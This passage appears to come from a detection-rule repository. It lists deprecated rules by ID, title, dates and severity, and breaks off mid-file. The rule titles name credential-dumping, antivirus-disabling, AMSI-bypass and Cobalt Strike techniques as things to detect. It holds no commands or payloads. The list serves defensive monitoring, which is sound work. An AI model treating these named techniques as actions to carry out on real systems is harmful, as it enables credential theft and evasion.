Cmd.exe,2022-08-20,2023-03-07,medium\n70e68156-6571-427b-a6e9-4476a173a9b6,Cmd Stream Redirection,2022-02-04,2023-03-07,medium\n033fe7d6-66d1-4240-ac6b-28908009c71f,APT29,2018-12-04,2023-03-08,high\n04d9079e-3905-4b70-ad37-6bdf11304965,CrackMapExecWin,2018-04-08,2023-03-08,critical\n18739897-21b1-41da-8ee4-5b786915a676,GALLIUM Artefacts,2020-02-07,2023-03-09,high\n0eb2107b-a596-422e-b123-b389d5594ed7,Hurricane Panda Activity,2019-03-04,2023-03-10,high\n4a12fa47-c735-4032-a214-6fab5b120670,Lazarus Activity Apr21,2021-04-20,2023-03-10,high\n7454df60-1478-484b-810d-bff5d0ba6d4b,DNS Tunnel Technique from MuddyWater,2020-06-04,2023-03-10,critical\n7b49c990-4a9a-4e65-ba95-47c9cc448f6e,Lazarus Loaders,2020-12-23,2023-03-10,critical\n43f487f0-755f-4c2a-bce7-d6d2eec2fcf8,Suspicious Add Scheduled Task From User AppData Temp,2021-11-03,2023-03-14,high\nd813d662-785b-42ca-8b4a-f7457d78d5a9,Suspicious Load of Advapi31.dll,2022-02-03,2023-03-15,informational\ne74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9,Edit of .bash_profile and .bashrc,2019-05-12,2023-03-23,medium\nba2a7c80-027b-460f-92e2-57d113897dbc,App Permissions Granted For Other APIs,2022-07-28,2023-03-29,medium\n18cf6cf0-39b0-4c22-9593-e244bdc9a2d4,TA505 Dropper Load Pattern,2020-12-08,2023-04-05,critical\n2d117e49-e626-4c7c-bd1f-c3c0147774c8,Potential PowerShell Base64 Encoded Shellcode,2018-11-17,2023-04-06,medium\n635dbb88-67b3-4b41-9ea5-a3af2dd88153,Microsoft Binary Github Communication,2017-08-24,2023-04-18,high\n6c939dfa-c710-4e12-a4dd-47e1f10e68e1,Domestic Kitten FurBall Malware Pattern,2021-02-08,2023-04-20,high\n6355a919-2e97-4285-a673-74645566340d,Process Memory Dumped Via RdrLeakDiag.EXE,2022-01-04,2023-04-24,high\n9cf01b6c-e723-4841-a868-6d7f8245ca6e,Group Modification Logging,2019-03-26,2023-04-26,low\n410ad193-a728-4107-bc79-4419789fcbf8,Trickbot Malware Reconnaissance Activity,2019-12-28,2023-04-28,high\nfce5f582-cc00-41e1-941a-c6fabf0fdb8c,Suspicious PowerShell Invocations - Specific,2017-03-05,2023-05-04,high\nf016c716-754a-467f-a39e-63c06f773987,Suspicious Remote Thread Target,2022-08-25,2023-05-05,medium\n65d2be45-8600-4042-b4c0-577a1ff8a60e,Application Whitelisting Bypass via DLL Loaded by odbcconf.exe,2019-10-25,2023-05-22,medium\n8e2b24c9-4add-46a0-b4bb-0057b4e6187d,Regsvr32 Anomaly,2019-01-16,2023-05-26,high\nfe6e002f-f244-4278-9263-20e4b593827f,Alternate PowerShell Hosts - Image,2019-09-12,2023-06-01,low\n9e77ed63-2ecf-4c7b-b09d-640834882028,PsExec Pipes Artifacts,2020-05-10,2023-08-07,medium\n39776c99-1c7b-4ba0-b5aa-641525eee1a4,Execution via CL_Mutexverifiers.ps1,2020-10-14,2023-08-17,high\n4cd29327-685a-460e-9dac-c3ab96e549dc,Execution via CL_Invocation.ps1 - Powershell,2020-10-14,2023-08-17,high\n4e8d5fd3-c959-441f-a941-f73d0cdcdca5,Abusing Windows Telemetry For Persistence - Registry,2020-09-29,2023-08-17,high\n7c637634-c95d-4bbf-b26c-a82510874b34,Disable Microsoft Office Security Features,2021-06-08,2023-08-17,high\n8a58209c-7ae6-4027-afb0-307a78e4589a,User Account Hidden By Registry,2022-08-20,2023-08-17,high\n9b894e57-033f-46cf-b7fa-a52804181973,Office Security Settings Changed,2020-05-22,2023-08-17,high\nc81fe886-cac0-4913-a511-2822d72ff505,SilentProcessExit Monitor Registration,2021-02-26,2023-08-17,high\n0c1ffcf9-efa9-436e-ab68-23a9496ebf5b,User Added To Admin Group - MacOS,2023-03-19,2023-08-22,medium\n5b80cf53-3a46-4adc-960b-05ec19348d74,Wscript Execution from Non C Drive,2022-10-01,2023-08-29,medium\n5e3d3601-0662-4af0-b1d2-36a05e90c40a,LSASS Memory Dump File Creation,2019-10-22,2023-08-29,high\n839f1ee1-292d-495a-bf37-818267b8ee82,Vulnerable Driver Load By Name,2022-10-03,2023-09-03,low\n21b23707-60d6-41bb-96e3-0f0481b0fed9,Vulnerable Dell BIOS Update Driver Load,2021-05-05,2023-09-12,high\n7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647,Vulnerable GIGABYTE Driver Load,2022-07-25,2023-09-12,high\n7c676970-af4f-43c8-80af-ec9b49952852,Vulnerable AVAST Anti Rootkit Driver Load,2022-07-28,2023-09-12,high\n9bacc538-d1b9-4d42-862e-469eafc05a41,Vulnerable HW Driver Load,2022-07-26,2023-09-12,high\nac683a42-877b-4ff8-91ac-69e94b0f70b4,Vulnerable Lenovo Driver Load,2022-11-10,2023-09-12,high\n91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6,Usage Of Malicious POORTRY Signed Driver,2022-12-16,2023-09-13,high\nd7825193-b70a-48a4-b992-8b5b3015cc11,Windows Update Client LOLBIN,2020-10-17,2023-11-11,high\nca83e9f3-657a-45d0-88d6-c1ac280caf53,New Service Uses Double Ampersand in Path,2022-07-05,2023-11-15,high\nfe34868f-6e0e-4882-81f6-c43aa8f15b62,Windows Defender Threat Detection Disabled,2020-07-28,2023-11-22,high\n32d0d3e2-e58d-4d41-926b-18b520b2b32d,Credential Dumping Tools Accessing LSASS Memory,2017-02-16,2023-11-30,high\na122ac13-daf8-4175-83a2-72c387be339d,Security Event Log Cleared,2021-08-15,2023-12-06,medium\n0332a266-b584-47b4-933d-a00b103e1b37,Suspicious Get-WmiObject,2022-01-12,2023-12-11,low\n46deb5e1-28c9-4905-b2df-51cdcc9e6073,PowerShell Scripts Run by a Services,2020-10-06,2023-12-11,high\nd23f2ba5-9da0-4463-8908-8ee47f614bb9,Powershell File and Directory Discovery,2021-12-15,2023-12-11,low\ndf5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2,Credential Dumping Tools Service Execution,2017-03-05,2023-12-11,critical\n602a1f13-c640-4d73-b053-be9a2fa58b77,Svchost DLL Search Order Hijack,2019-10-28,2024-01-10,high\n839dd1e8-eda8-4834-8145-01beeee33acd,SAM Dump to AppData,2018-01-27,2024-01-18,high\ne32ce4f5-46c6-4c47-ba69-5de3c9193cd7,Possible Process Hollowing Image Loading,2018-01-07,2024-01-22,high\na6d67db4-6220-436d-8afc-f3842fe05d43,Dnscat Execution,2019-10-24,2024-01-25,critical\nd7b09985-95a3-44be-8450-b6eadf49833e,Suspicious Non-Browser Network Communication With Reddit API,2023-02-16,2024-02-02,medium\n37325383-740a-403d-b1a2-b2b4ab7992e7,CobaltStrike Malleable (OCSP) Profile,2019-11-12,2024-02-15,high\n41b42a36-f62c-4c34-bd40-8cb804a34ad8,CobaltStrike Malformed UAs in Malleable Profiles,2021-05-06,2024-02-15,critical\n953b895e-5cc9-454b-b183-7f3db555452e,CobaltStrike Malleable Amazon Browsing Traffic Profile,2019-11-12,2024-02-15,high\nc9b33401-cc6a-4cf6-83bb-57ddcb2407fc,CobaltStrike Malleable OneDrive Browsing Traffic Profile,2019-11-12,2024-02-15,high\n73fcad2e-ff14-4c38-b11d-4172c8ac86c7,Suspicious Rundll32 Script in CommandLine,2021-12-04,2024-02-23,medium\n9f06447a-a33a-4cbe-a94f-a3f43184a7a3,Rundll32 JS RunHTMLApplication Pattern,2022-01-14,2024-02-23,high\ne06ac91d-b9e6-443d-8e5b-af749e7aa6b6,iOS Implant URL Pattern,2019-08-30,2024-02-26,critical\n628d7a0b-7b84-4466-8552-e6138bc03b43,Suspicious Epmap Connection,2022-07-14,2024-03-01,high\n9433ff9c-5d3f-4269-99f8-95fc826ea489,CrackMapExec File Creation Patterns,2022-03-12,2024-03-01,high\nc625c4c2-515d-407f-8bb6-456f65955669,Service Binary in Uncommon Folder,2022-05-02,2024-03-25,medium\n42f0e038-767e-4b85-9d96-2c6335bad0b5,Adwind RAT / JRAT - Registry,2017-11-10,2024-03-26,high\n5039f3d2-406a-4c1a-9350-7a5a85dc84c2,Search-ms and WebDAV Suspicious Indicators in URL,2023-08-21,2024-05-10,high\nb916cba1-b38a-42da-9223-17114d846fd6,Potential NT API Stub Patching,2023-01-07,2024-05-27,medium\n3d968d17-ffa4-4bc0-bfdc-f139de76ce77,Potential Persistence Via COM Hijacking From Suspicious Locations,2022-07-28,2024-07-16,high\n1a3d42dd-3763-46b9-8025-b5f17f340dfb,Suspicious Unattend.xml File Access,2021-12-19,2024-07-22,medium\n6902955a-01b7-432c-b32a-6f5f81d8f624,Suspicious File Event With Teams Objects,2022-09-16,2024-07-22,high\na0ff33d8-79e4-4cef-b4f3-9dc4133ccd12,Potential Persistence Via COM Search Order Hijacking,2020-04-14,2024-09-02,medium\na33f8808-2812-4373-ae95-8cfb82134978,Windows Defender Exclusion Deleted,2019-10-26,2025-01-30,medium\ne17121b4-ef2a-4418-8a59-12fb1631fa9e,Delete Volume Shadow Copies via WMI with PowerShell - PS Script,2021-12-26,2025-05-20,high\n6e897651-f157-4d8f-aaeb-df8151488385,PowerShell Web Download,2022-03-24,2025-07-18,medium\nf748c45a-f8d3-4e6f-b617-fe176f695b8f,.RDP File Created by Outlook Process,2024-11-01,2025-07-22,high\na2a3b925-7bb0-433b-b508-db9003263cc4,Active Directory Parsing DLL Loaded Via Office Application,2020-02-19,2025-10-17,medium\ncdeef967-f9a1-4375-90ee-6978c5f23974,Azure Application Credential Modified,2021-09-02,2025-10-17,medium\n8f70ac5f-1f6f-4f8e-b454-db19561216c5,PowerShell DownloadFile,2020-08-28,2025-10-20,high\ne28a5a99-da44-436d-b7a0-2afc20a5f413,Whoami Utility Execution,2018-08-13,2025-10-20,low\n7417e29e-c2e7-4cf6-a2e8-767228c64837,Active Directory Kerberos DLL Loaded Via Office Application,2020-02-19,2025-10-22,medium\n879c3015-c88b-4782-93d7-07adf92dbcb7,Space After Filename,2020-06-17,2025-11-22,low\ne710a880-1f18-4417-b6a0-b5afdf7e305a,Atomic MacOS Stealer - FileGrabber Infostealer Execution,2025-09-12,2025-11-22,high\n4be03877-d5b6-4520-85c9-a5911c0a656c,FileFix - Suspicious Child Process from Browser File Upload Abuse,2025-06-26,2025-11-24,high\n6e30c82f-a9f8-4aab-b79c-7c12bce6f248,File Download Via Bitsadmin To An Uncommon Target Folder,2022-06-28,2025-12-10,medium\n"
  },
  {
    "path": "deprecated/deprecated.json",
    "content": "[\n    {\n        \"id\": \"867613fb-fa60-4497-a017-a82df74a172c\",\n        \"title\": \"PowerShell Execution\",\n        \"date\": \"2019-09-12\",\n        \"modified\": \"2021-11-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"0d894093-71bc-43c3-8c4d-ecfc28dcf5d9\",\n        \"title\": \"Mimikatz Detection LSASS Access\",\n        \"date\": \"2017-10-18\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"3d304fda-78aa-43ed-975c-d740798a49c1\",\n        \"title\": \"Suspicious PowerShell Invocations - Generic\",\n        \"date\": \"2017-03-12\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"56a8189f-11b2-48c8-8ca7-c54b03c2fbf7\",\n        \"title\": \"Suspicious Esentutl Use\",\n        \"date\": \"2020-05-23\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"65531a81-a694-4e31-ae04-f8ba5bc33759\",\n        \"title\": \"Suspicious PowerShell Download\",\n        \"date\": \"2017-03-05\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"9f7aa113-9da6-4a8d-907c-5f1a4b908299\",\n        \"title\": \"SyncAppvPublishingServer Execution to Bypass Powershell Restriction\",\n        \"date\": \"2020-10-05\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"a0d63692-a531-4912-ad39-4393325b2a9c\",\n        \"title\": \"RClone Execution\",\n        \"date\": \"2021-05-10\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"b932b60f-fdda-4d53-8eda-a170c1d97bbd\",\n        \"title\": \"Activity Related to NTDS.dit Domain Hash Retrieval\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"cb7286ba-f207-44ab-b9e6-760d82b84253\",\n        \"title\": \"Rclone Execution via Command Line or PowerShell\",\n        \"date\": \"2021-05-26\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fde7929d-8beb-4a4c-b922-be9974671667\",\n        \"title\": \"SyncAppvPublishingServer Execution to Bypass Powershell Restriction\",\n        \"date\": \"2020-10-05\",\n        \"modified\": \"2022-04-11\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"17f878b8-9968-4578-b814-c4217fc5768c\",\n        \"title\": \"Autorun Keys Modification\",\n        \"date\": \"2019-10-25\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"29d31aee-30f4-4006-85a9-a4a02d65306c\",\n        \"title\": \"Lateral Movement Indicator ConDrv\",\n        \"date\": \"2021-04-27\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"98f4c75c-3089-44f3-b733-b327b9cd9c9d\",\n        \"title\": \"Accessing Encrypted Credentials from Google Chrome Login Database\",\n        \"date\": \"2021-12-20\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"a457f232-7df9-491d-898f-b5aabd2cbe2f\",\n        \"title\": \"Windows Management Instrumentation DLL Loaded Via Microsoft Word\",\n        \"date\": \"2019-12-26\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"informational\"\n    },\n    {\n        \"id\": \"db2110f3-479d-42a6-94fb-d35bc1e46492\",\n        \"title\": \"CreateMiniDump Hacktool\",\n        \"date\": \"2019-12-22\",\n        \"modified\": \"2022-05-14\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"2621b3a6-3840-4810-ac14-a02426086171\",\n        \"title\": \"Winword.exe Loads Suspicious DLL\",\n        \"date\": \"2020-10-09\",\n        \"modified\": \"2022-07-25\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"bf6c39fc-e203-45b9-9538-05397c1b4f3f\",\n        \"title\": \"Abusing Findstr for Defense Evasion\",\n        \"date\": \"2020-10-05\",\n        \"modified\": \"2022-10-12\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719\",\n        \"title\": \"Possible Applocker Bypass\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2022-11-03\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"dca91cfd-d7ab-4c66-8da7-ee57d487b35b\",\n        \"title\": \"Process Start From Suspicious Folder\",\n        \"date\": \"2022-02-11\",\n        \"modified\": \"2022-11-03\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"53c7cca0-2901-493a-95db-d00d6fcf0a37\",\n        \"title\": \"Brute Force\",\n        \"date\": \"2019-10-25\",\n        \"modified\": \"2022-11-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"5f113a8f-8b61-41ca-b90f-d374fa7e4a39\",\n        \"title\": \"Suspicious In-Memory Module Execution\",\n        \"date\": \"2019-10-27\",\n        \"modified\": \"2022-11-17\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"f67dbfce-93bc-440d-86ad-a95ae8858c90\",\n        \"title\": \"Suspicious Bitsadmin Job via PowerShell\",\n        \"date\": \"2018-10-30\",\n        \"modified\": \"2022-11-21\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9d1c72f5-43f0-4da5-9320-648cf2099dd0\",\n        \"title\": \"Excel Proxy Executing Regsvr32 With Payload\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2022-12-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c0e1c3d5-4381-4f18-8145-2583f06a1fe5\",\n        \"title\": \"Excel Proxy Executing Regsvr32 With Payload Alternate\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2022-12-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"72671447-4352-4413-bb91-b85569687135\",\n        \"title\": \"Nslookup PwSh Download Cradle\",\n        \"date\": \"2022-09-06\",\n        \"modified\": \"2022-12-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"3f07b9d1-2082-4c56-9277-613a621983cc\",\n        \"title\": \"Accessing WinAPI in PowerShell for Credentials Dumping\",\n        \"date\": \"2020-10-06\",\n        \"modified\": \"2022-12-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e554f142-5cf3-4e55-ace9-a1b59e0def65\",\n        \"title\": \"DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon\",\n        \"date\": \"2020-10-12\",\n        \"modified\": \"2022-12-18\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"17eb8e57-9983-420d-ad8a-2c4976c22eb8\",\n        \"title\": \"MavInject Process Injection\",\n        \"date\": \"2018-12-12\",\n        \"modified\": \"2022-12-19\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"36c5146c-d127-4f85-8e21-01bf62355d5a\",\n        \"title\": \"Invoke-Obfuscation Via Use Rundll32\",\n        \"date\": \"2019-10-08\",\n        \"modified\": \"2022-12-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6d3f1399-a81c-4409-aff3-1ecfe9330baf\",\n        \"title\": \"PrintNightmare Powershell Exploitation\",\n        \"date\": \"2021-08-09\",\n        \"modified\": \"2023-01-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"83083ac6-1816-4e76-97d7-59af9a9ae46e\",\n        \"title\": \"AzureHound PowerShell Commands\",\n        \"date\": \"2021-10-23\",\n        \"modified\": \"2023-01-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a85cf4e3-56ee-4e79-adeb-789f8fb209a8\",\n        \"title\": \"Indirect Command Exectuion via Forfiles\",\n        \"date\": \"2022-10-17\",\n        \"modified\": \"2023-01-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"fa47597e-90e9-41cd-ab72-c3b74cfb0d02\",\n        \"title\": \"Indirect Command Execution\",\n        \"date\": \"2019-10-24\",\n        \"modified\": \"2023-01-04\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"e4b63079-6198-405c-abd7-3fe8b0ce3263\",\n        \"title\": \"Suspicious CLR Logs Creation\",\n        \"date\": \"2020-10-12\",\n        \"modified\": \"2023-01-05\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"cd5c8085-4070-4e22-908d-a5b3342deb74\",\n        \"title\": \"Suspicious Bitstransfer via PowerShell\",\n        \"date\": \"2021-08-19\",\n        \"modified\": \"2023-01-10\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20\",\n        \"title\": \"Renamed PowerShell\",\n        \"date\": \"2019-08-22\",\n        \"modified\": \"2023-01-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2\",\n        \"title\": \"Renamed Rundll32.exe Execution\",\n        \"date\": \"2022-06-08\",\n        \"modified\": \"2023-01-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e31f89f7-36fb-4697-8ab6-48823708353b\",\n        \"title\": \"Suspicious Cmd Execution via WMI\",\n        \"date\": \"2022-09-27\",\n        \"modified\": \"2023-01-19\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\",\n        \"title\": \"Netcat The Powershell Version - PowerShell Module\",\n        \"date\": \"2021-07-21\",\n        \"modified\": \"2023-01-20\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"47688f1b-9f51-4656-b013-3cc49a166a36\",\n        \"title\": \"Base64 Encoded Listing of Shadowcopy\",\n        \"date\": \"2022-03-01\",\n        \"modified\": \"2023-01-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"5b572dcf-254b-425c-a8c5-d9af6bea35a6\",\n        \"title\": \"Potential Xor Encoded PowerShell Command\",\n        \"date\": \"2022-07-06\",\n        \"modified\": \"2023-01-30\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"fd6e2919-3936-40c9-99db-0aa922c356f7\",\n        \"title\": \"Malicious Base64 Encoded Powershell Invoke Cmdlets\",\n        \"date\": \"2022-05-31\",\n        \"modified\": \"2023-01-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"eeb66bbb-3dde-4582-815a-584aee9fe6d1\",\n        \"title\": \"Correct Execution of Nltest.exe\",\n        \"date\": \"2021-10-04\",\n        \"modified\": \"2023-02-02\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"0acaad27-9f02-4136-a243-c357202edd74\",\n        \"title\": \"Ryuk Ransomware Command Line Activity\",\n        \"date\": \"2019-08-06\",\n        \"modified\": \"2023-02-03\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"4f927692-68b5-4267-871b-073c45f4f6fe\",\n        \"title\": \"PowerShell AMSI Bypass Pattern\",\n        \"date\": \"2022-11-04\",\n        \"modified\": \"2023-02-03\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e\",\n        \"title\": \"Registry Dump of SAM Creds and Secrets\",\n        \"date\": \"2022-01-05\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"04f5363a-6bca-42ff-be70-0d28bf629ead\",\n        \"title\": \"Office Applications Spawning Wmi Cli Alternate\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"23daeb52-e6eb-493c-8607-c4f0246cb7d8\",\n        \"title\": \"New Lolbin Process by Office Applications\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"518643ba-7d9c-4fa5-9f37-baed36059f6a\",\n        \"title\": \"WMI Execution Via Office Process\",\n        \"date\": \"2021-08-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"77815820-246c-47b8-9741-e0def3f57308\",\n        \"title\": \"Domain Trust Discovery\",\n        \"date\": \"2019-10-23\",\n        \"modified\": \"2023-02-04\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"4d6c9da1-318b-4edf-bcea-b6c93fa98fd0\",\n        \"title\": \"Credential Acquisition via Registry Hive Dumping\",\n        \"date\": \"2022-10-04\",\n        \"modified\": \"2023-02-06\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6545ce61-a1bd-4119-b9be-fcbee42c0cf3\",\n        \"title\": \"Execute MSDT.EXE Using Diagcab File\",\n        \"date\": \"2022-06-09\",\n        \"modified\": \"2023-02-06\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9841b233-8df8-4ad7-9133-b0b4402a9014\",\n        \"title\": \"Sysinternals SDelete Registry Keys\",\n        \"date\": \"2020-05-02\",\n        \"modified\": \"2023-02-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"09af397b-c5eb-4811-b2bb-08b3de464ebf\",\n        \"title\": \"WMI Reconnaissance List Remote Services\",\n        \"date\": \"2022-01-01\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"7b0666ad-3e38-4e3d-9bab-78b06de85f7b\",\n        \"title\": \"Renamed PaExec Execution\",\n        \"date\": \"2019-04-17\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"bc3cc333-48b9-467a-9d1f-d44ee594ef48\",\n        \"title\": \"SCM DLL Sideload\",\n        \"date\": \"2022-12-01\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"e42af9df-d90b-4306-b7fb-05c863847ebd\",\n        \"title\": \"WMI Remote Command Execution\",\n        \"date\": \"2022-03-13\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"fa4b21c9-0057-4493-b289-2556416ae4d7\",\n        \"title\": \"Squirrel Lolbin\",\n        \"date\": \"2019-11-12\",\n        \"modified\": \"2023-02-14\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"e011a729-98a6-4139-b5c4-bf6f6dd8239a\",\n        \"title\": \"Suspicious Certutil Command Usage\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2023-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"034affe8-6170-11ec-844f-0f78aa0c4d66\",\n        \"title\": \"Mimikatz MemSSP Default Log File Creation\",\n        \"date\": \"2021-12-20\",\n        \"modified\": \"2023-02-16\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"7fe71fc9-de3b-432a-8d57-8c809efc10ab\",\n        \"title\": \"New Service Creation\",\n        \"date\": \"2019-10-21\",\n        \"modified\": \"2023-02-20\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"056a7ee1-4853-4e67-86a0-3fd9ceed7555\",\n        \"title\": \"Invoke-Obfuscation RUNDLL LAUNCHER\",\n        \"date\": \"2020-10-18\",\n        \"modified\": \"2023-02-21\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"3ede524d-21cc-472d-a3ce-d21b568d8db7\",\n        \"title\": \"PsExec Service Start\",\n        \"date\": \"2018-03-13\",\n        \"modified\": \"2023-02-28\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"80167ada-7a12-41ed-b8e9-aa47195c66a1\",\n        \"title\": \"Run Whoami as SYSTEM\",\n        \"date\": \"2019-10-23\",\n        \"modified\": \"2023-02-28\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\",\n        \"title\": \"PsExec Tool Execution\",\n        \"date\": \"2017-06-12\",\n        \"modified\": \"2023-02-28\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"2c0d2d7b-30d6-4d14-9751-7b9113042ab9\",\n        \"title\": \"Suspicious Characters in CommandLine\",\n        \"date\": \"2022-04-27\",\n        \"modified\": \"2023-03-03\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6783aa9e-0dc3-49d4-a94a-8b39c5fd700b\",\n        \"title\": \"Stop Or Remove Antivirus Service\",\n        \"date\": \"2021-07-07\",\n        \"modified\": \"2023-03-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7fd4bb39-12d0-45ab-bb36-cebabc73dc7b\",\n        \"title\": \"Suspicious Execution of Sc to Delete AV Services\",\n        \"date\": \"2022-08-01\",\n        \"modified\": \"2023-03-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2\",\n        \"title\": \"Renamed PsExec\",\n        \"date\": \"2019-05-21\",\n        \"modified\": \"2023-03-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"1a70042a-6622-4a2b-8958-267625349abf\",\n        \"title\": \"Run from a Zip File\",\n        \"date\": \"2021-12-26\",\n        \"modified\": \"2023-03-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"46591fae-7a4c-46ea-aec3-dff5e6d785dc\",\n        \"title\": \"Root Certificate Installed\",\n        \"date\": \"2020-10-10\",\n        \"modified\": \"2023-03-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"eb87818d-db5d-49cc-a987-d5da331fbd90\",\n        \"title\": \"Stop Windows Service\",\n        \"date\": \"2019-10-23\",\n        \"modified\": \"2023-03-05\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"23250293-eed5-4c39-b57a-841c8933a57d\",\n        \"title\": \"Visual Basic Script Execution\",\n        \"date\": \"2022-01-02\",\n        \"modified\": \"2023-03-06\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"344482e4-a477-436c-aa70-7536d18a48c7\",\n        \"title\": \"Execution via MSSQL Xp_cmdshell Stored Procedure\",\n        \"date\": \"2022-09-28\",\n        \"modified\": \"2023-03-06\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"00a4bacd-6db4-46d5-9258-a7d5ebff4003\",\n        \"title\": \"Read and Execute a File Via Cmd.exe\",\n        \"date\": \"2022-08-20\",\n        \"modified\": \"2023-03-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"70e68156-6571-427b-a6e9-4476a173a9b6\",\n        \"title\": \"Cmd Stream Redirection\",\n        \"date\": \"2022-02-04\",\n        \"modified\": \"2023-03-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"033fe7d6-66d1-4240-ac6b-28908009c71f\",\n        \"title\": \"APT29\",\n        \"date\": \"2018-12-04\",\n        \"modified\": \"2023-03-08\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"04d9079e-3905-4b70-ad37-6bdf11304965\",\n        \"title\": \"CrackMapExecWin\",\n        \"date\": \"2018-04-08\",\n        \"modified\": \"2023-03-08\",\n        \"level\": \"critical\"\n    },\n    